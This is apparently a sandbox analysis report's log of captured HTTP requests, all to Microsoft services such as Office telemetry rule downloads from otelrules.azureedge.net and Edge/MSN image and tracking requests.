Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /c.gif?rnd=1731210922530&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=1b1c38cab0134bc7a8e603f795c6d608&activityId=1b1c38cab0134bc7a8e603f795c6d608&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=7D43837CDE984B5C93357FDF0CAA9AAC&MUID=1C457A5C69C96D7328066F6F68476CEB HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=1C457A5C69C96D7328066F6F68476CEB; _EDGE_S=F=1&SID=04348CE3E2B16FF0131799D0E3856EA1; _EDGE_V=1; SM=T; _C_ETH=1
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA12sf7A.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA11MZ4M.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/BB1msOOW.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA1cLbwq?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA1sFuPI?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AAAAWUx?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AAtK5aP?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/BB18CMuA?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
